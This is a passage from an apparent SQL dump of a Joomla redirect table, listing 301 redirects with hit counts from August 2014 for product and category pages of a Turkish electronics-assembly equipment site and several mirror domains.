07:30:07','0000-00-00 00:00:00',301),(1168,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',2,0,'2014-08-06 07:40:54','0000-00-00 00:00:00',301),(1169,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=125&Itemid=131','','','',9,0,'2014-08-06 07:44:24','0000-00-00 00:00:00',301),(1170,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',28,0,'2014-08-06 07:46:32','0000-00-00 00:00:00',301),(1171,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',17,0,'2014-08-06 08:07:17','0000-00-00 00:00:00',301),(1172,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100','','','',2,0,'2014-08-06 08:10:06','0000-00-00 00:00:00',301),(1173,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',87,0,'2014-08-06 08:12:59','0000-00-00 00:00:00',301),(1174,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',3,0,'2014-08-06 08:15:49','0000-00-00 00:00:00',301),(1175,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',1,0,'2014-08-06 08:19:16','0000-00-00 00:00:00',301),(1176,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',2,0,'2014-08-06 08:33:57','0000-00-00 00:00:00',301),(1177,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',6,0,'2014-08-06 08:34:18','0000-00-00 00:00:00',301),(1178,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',9,0,'2014-08-06 08:41:32','0000-00-00 00:00:00',301),(1179,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',5,0,'2014-08-06 08:49:15','0000-00-00 00:00:00',301),(1180,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',8,0,'2014-08-06 09:10:17','0000-00-00 00:00:00',301),(1181,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144','','','',2,0,'2014-08-06 09:10:25','0000-00-00 00:00:00',301),(1182,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',11,0,'2014-08-06 09:12:07','0000-00-00 00:00:00',301),(1183,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',2,0,'2014-08-06 09:19:36','0000-00-00 00:00:00',301),(1184,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',1,0,'2014-08-06 09:23:28','0000-00-00 00:00:00',301),(1185,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',5,0,'2014-08-06 09:34:03','0000-00-00 00:00:00',301),(1186,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',3,0,'2014-08-06 09:56:06','0000-00-00 00:00:00',301),(1187,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',3,0,'2014-08-06 09:58:41','0000-00-00 00:00:00',301),(1188,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',32,0,'2014-08-06 10:00:54','0000-00-00 00:00:00',301),(1189,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',8,0,'2014-08-06 10:04:24','0000-00-00 00:00:00',301),(1190,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',2,0,'2014-08-06 10:14:28','0000-00-00 00:00:00',301),(1191,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',8,0,'2014-08-06 10:18:40','0000-00-00 00:00:00',301),(1192,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',12,0,'2014-08-06 10:19:24','0000-00-00 00:00:00',301),(1193,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',1,0,'2014-08-06 10:58:41','0000-00-00 00:00:00',301),(1194,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',2,0,'2014-08-06 11:03:17','0000-00-00 00:00:00',301),(1195,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',3,0,'2014-08-06 11:18:24','0000-00-00 00:00:00',301),(1196,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',12,0,'2014-08-06 11:48:17','0000-00-00 00:00:00',301),(1197,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',1,0,'2014-08-06 11:48:38','0000-00-00 00:00:00',301),(1198,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',5,0,'2014-08-06 11:55:51','0000-00-00 00:00:00',301),(1199,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',10,0,'2014-08-06 12:08:25','0000-00-00 00:00:00',301),(1200,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164','','','',4,0,'2014-08-06 12:15:49','0000-00-00 00:00:00',301),(1201,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',8,0,'2014-08-06 12:33:22','0000-00-00 00:00:00',301),(1202,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',172,0,'2014-08-06 12:42:59','0000-00-00 00:00:00',301),(1203,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',4,0,'2014-08-06 12:56:21','0000-00-00 00:00:00',301),(1204,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',3,0,'2014-08-06 12:56:35','0000-00-00 00:00:00',301),(1205,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',3,0,'2014-08-06 12:56:38','0000-00-00 00:00:00',301),(1206,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',3,0,'2014-08-06 12:57:14','0000-00-00 00:00:00',301),(1207,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',3,0,'2014-08-06 13:05:45','0000-00-00 00:00:00',301),(1208,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',6,0,'2014-08-06 13:07:15','0000-00-00 00:00:00',301),(1209,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',11,0,'2014-08-06 13:09:00','0000-00-00 00:00:00',301),(1210,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',3,0,'2014-08-06 13:10:24','0000-00-00 00:00:00',301),(1211,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',55,0,'2014-08-06 13:14:26','0000-00-00 00:00:00',301),(1212,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',2,0,'2014-08-06 13:21:48','0000-00-00 00:00:00',301),(1213,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',4,0,'2014-08-06 13:42:41','0000-00-00 00:00:00',301),(1214,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',8,0,'2014-08-06 14:01:31','0000-00-00 00:00:00',301),(1215,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=&lang=tr','','','',2,0,'2014-08-06 14:10:12','0000-00-00 00:00:00',301),(1216,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',8,0,'2014-08-06 14:13:03','0000-00-00 00:00:00',301),(1217,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',13,0,'2014-08-06 14:16:02','0000-00-00 00:00:00',301),(1218,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-08-06 14:16:11','0000-00-00 00:00:00',301),(1219,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',30,0,'2014-08-06 14:29:04','0000-00-00 00:00:00',301),(1220,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=en','','','',1,0,'2014-08-06 14:31:19','0000-00-00 00:00:00',301),(1221,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&lang=en','','','',1,0,'2014-08-06 14:47:56','0000-00-00 00:00:00',301),(1222,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',4,0,'2014-08-06 14:57:26','0000-00-00 00:00:00',301),(1223,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',3,0,'2014-08-06 14:57:41','0000-00-00 00:00:00',301),(1224,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',7,0,'2014-08-06 15:01:11','0000-00-00 00:00:00',301),(1225,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',10,0,'2014-08-06 15:04:03','0000-00-00 00:00:00',301),(1226,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',6,0,'2014-08-06 15:06:55','0000-00-00 00:00:00',301),(1227,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',1,0,'2014-08-06 15:48:45','0000-00-00 00:00:00',301),(1228,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',3,0,'2014-08-06 15:51:02','0000-00-00 00:00:00',301),(1229,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',4,0,'2014-08-06 16:01:19','0000-00-00 00:00:00',301),(1230,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',5,0,'2014-08-06 16:18:46','0000-00-00 00:00:00',301),(1231,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',37,0,'2014-08-06 16:19:23','0000-00-00 00:00:00',301),(1232,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',31,0,'2014-08-06 16:23:51','0000-00-00 00:00:00',301),(1233,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',30,0,'2014-08-06 16:23:57','0000-00-00 00:00:00',301),(1234,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',31,0,'2014-08-06 16:24:05','0000-00-00 00:00:00',301),(1235,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',32,0,'2014-08-06 16:24:10','0000-00-00 00:00:00',301),(1236,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',35,0,'2014-08-06 16:24:16','0000-00-00 00:00:00',301),(1237,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',38,0,'2014-08-06 16:24:24','0000-00-00 00:00:00',301),(1238,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',43,0,'2014-08-06 16:24:28','0000-00-00 00:00:00',301),(1239,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',55,0,'2014-08-06 16:24:33','0000-00-00 00:00:00',301),(1240,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',29,0,'2014-08-06 16:24:37','0000-00-00 00:00:00',301),(1241,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',22,0,'2014-08-06 16:24:45','0000-00-00 00:00:00',301),(1242,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',30,0,'2014-08-06 16:24:52','0000-00-00 00:00:00',301),(1243,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',30,0,'2014-08-06 16:25:00','0000-00-00 00:00:00',301),(1244,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',29,0,'2014-08-06 16:29:47','0000-00-00 00:00:00',301),(1245,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',30,0,'2014-08-06 16:30:39','0000-00-00 00:00:00',301),(1246,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',30,0,'2014-08-06 16:31:35','0000-00-00 00:00:00',301),(1247,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',30,0,'2014-08-06 16:32:05','0000-00-00 00:00:00',301),(1248,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',27,0,'2014-08-06 16:32:40','0000-00-00 00:00:00',301),(1249,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',28,0,'2014-08-06 16:32:46','0000-00-00 00:00:00',301),(1250,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',27,0,'2014-08-06 16:33:18','0000-00-00 00:00:00',301),(1251,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',26,0,'2014-08-06 16:33:39','0000-00-00 00:00:00',301),(1252,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',28,0,'2014-08-06 16:33:44','0000-00-00 00:00:00',301),(1253,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',28,0,'2014-08-06 16:34:07','0000-00-00 00:00:00',301),(1254,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',24,0,'2014-08-06 16:34:36','0000-00-00 00:00:00',301),(1255,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',38,0,'2014-08-06 16:34:48','0000-00-00 00:00:00',301),(1256,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',38,0,'2014-08-06 16:35:08','0000-00-00 00:00:00',301),(1257,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',40,0,'2014-08-06 16:35:14','0000-00-00 00:00:00',301),(1258,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',38,0,'2014-08-06 16:35:20','0000-00-00 00:00:00',301),(1259,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',36,0,'2014-08-06 16:35:28','0000-00-00 00:00:00',301),(1260,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',38,0,'2014-08-06 16:35:36','0000-00-00 00:00:00',301),(1261,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',39,0,'2014-08-06 16:35:44','0000-00-00 00:00:00',301),(1262,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',37,0,'2014-08-06 16:36:18','0000-00-00 00:00:00',301),(1263,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',39,0,'2014-08-06 16:36:37','0000-00-00 00:00:00',301),(1264,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',4,0,'2014-08-06 16:36:41','0000-00-00 00:00:00',301),(1265,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',38,0,'2014-08-06 16:36:51','0000-00-00 00:00:00',301),(1266,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',38,0,'2014-08-06 16:36:58','0000-00-00 00:00:00',301),(1267,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',38,0,'2014-08-06 16:37:12','0000-00-00 00:00:00',301),(1268,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',38,0,'2014-08-06 16:37:42','0000-00-00 00:00:00',301),(1269,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',36,0,'2014-08-06 16:38:03','0000-00-00 00:00:00',301),(1270,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',35,0,'2014-08-06 16:38:16','0000-00-00 00:00:00',301),(1271,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',61,0,'2014-08-06 16:39:13','0000-00-00 00:00:00',301),(1272,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',36,0,'2014-08-06 16:39:40','0000-00-00 00:00:00',301),(1273,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',36,0,'2014-08-06 16:39:53','0000-00-00 00:00:00',301),(1274,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',36,0,'2014-08-06 16:40:07','0000-00-00 00:00:00',301),(1275,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',36,0,'2014-08-06 16:40:20','0000-00-00 00:00:00',301),(1276,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',35,0,'2014-08-06 16:40:30','0000-00-00 00:00:00',301),(1277,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',36,0,'2014-08-06 16:40:35','0000-00-00 00:00:00',301),(1278,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',36,0,'2014-08-06 16:40:41','0000-00-00 00:00:00',301),(1279,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',35,0,'2014-08-06 16:40:55','0000-00-00 00:00:00',301),(1280,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',36,0,'2014-08-06 16:41:02','0000-00-00 00:00:00',301),(1281,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',12,0,'2014-08-06 16:41:18','0000-00-00 00:00:00',301),(1282,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',14,0,'2014-08-06 16:41:25','0000-00-00 00:00:00',301),(1283,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',12,0,'2014-08-06 16:41:30','0000-00-00 00:00:00',301),(1284,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=&lang=en','','','',1,0,'2014-08-06 16:41:43','0000-00-00 00:00:00',301),(1285,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',32,0,'2014-08-06 16:43:26','0000-00-00 00:00:00',301),(1286,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',32,0,'2014-08-06 16:43:33','0000-00-00 00:00:00',301),(1287,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',44,0,'2014-08-06 16:43:44','0000-00-00 00:00:00',301),(1288,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',38,0,'2014-08-06 16:43:51','0000-00-00 00:00:00',301),(1289,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',34,0,'2014-08-06 16:43:55','0000-00-00 00:00:00',301),(1290,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',35,0,'2014-08-06 16:43:58','0000-00-00 00:00:00',301),(1291,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',38,0,'2014-08-06 16:44:13','0000-00-00 00:00:00',301),(1292,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',35,0,'2014-08-06 16:45:07','0000-00-00 00:00:00',301),(1293,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',28,0,'2014-08-06 16:47:55','0000-00-00 00:00:00',301),(1294,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',9,0,'2014-08-06 16:48:04','0000-00-00 00:00:00',301),(1295,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',27,0,'2014-08-06 16:48:18','0000-00-00 00:00:00',301),(1296,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',29,0,'2014-08-06 16:48:51','0000-00-00 00:00:00',301),(1297,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',33,0,'2014-08-06 16:49:04','0000-00-00 00:00:00',301),(1298,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',33,0,'2014-08-06 16:49:48','0000-00-00 00:00:00',301),(1299,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',10,0,'2014-08-06 16:50:03','0000-00-00 00:00:00',301),(1300,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100','','','',3,0,'2014-08-06 16:50:35','0000-00-00 00:00:00',301),(1301,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',30,0,'2014-08-06 16:50:39','0000-00-00 00:00:00',301),(1302,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',36,0,'2014-08-06 16:51:00','0000-00-00 00:00:00',301),(1303,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',25,0,'2014-08-06 16:51:12','0000-00-00 00:00:00',301),(1304,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',30,0,'2014-08-06 16:51:42','0000-00-00 00:00:00',301),(1305,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',30,0,'2014-08-06 16:52:19','0000-00-00 00:00:00',301),(1306,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',10,0,'2014-08-06 16:52:59','0000-00-00 00:00:00',301),(1307,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',7,0,'2014-08-06 17:08:55','0000-00-00 00:00:00',301),(1308,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87','','','',1,0,'2014-08-06 17:09:59','0000-00-00 00:00:00',301),(1309,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-08-06 17:15:52','0000-00-00 00:00:00',301),(1310,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',7,0,'2014-08-06 17:27:00','0000-00-00 00:00:00',301),(1311,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',3,0,'2014-08-06 17:46:36','0000-00-00 00:00:00',301),(1312,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',39,0,'2014-08-06 17:52:59','0000-00-00 00:00:00',301),(1313,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',30,0,'2014-08-06 18:45:31','0000-00-00 00:00:00',301),(1314,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',36,0,'2014-08-06 18:45:53','0000-00-00 00:00:00',301),(1315,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',42,0,'2014-08-06 18:46:02','0000-00-00 00:00:00',301),(1316,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',6,0,'2014-08-06 18:59:50','0000-00-00 00:00:00',301),(1317,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',10,0,'2014-08-06 19:08:47','0000-00-00 00:00:00',301),(1318,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',1,0,'2014-08-06 19:08:53','0000-00-00 00:00:00',301),(1319,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',12,0,'2014-08-06 19:11:11','0000-00-00 00:00:00',301),(1320,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=&lang=tr','','','',1,0,'2014-08-06 19:12:24','0000-00-00 00:00:00',301),(1321,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',5,0,'2014-08-06 19:13:37','0000-00-00 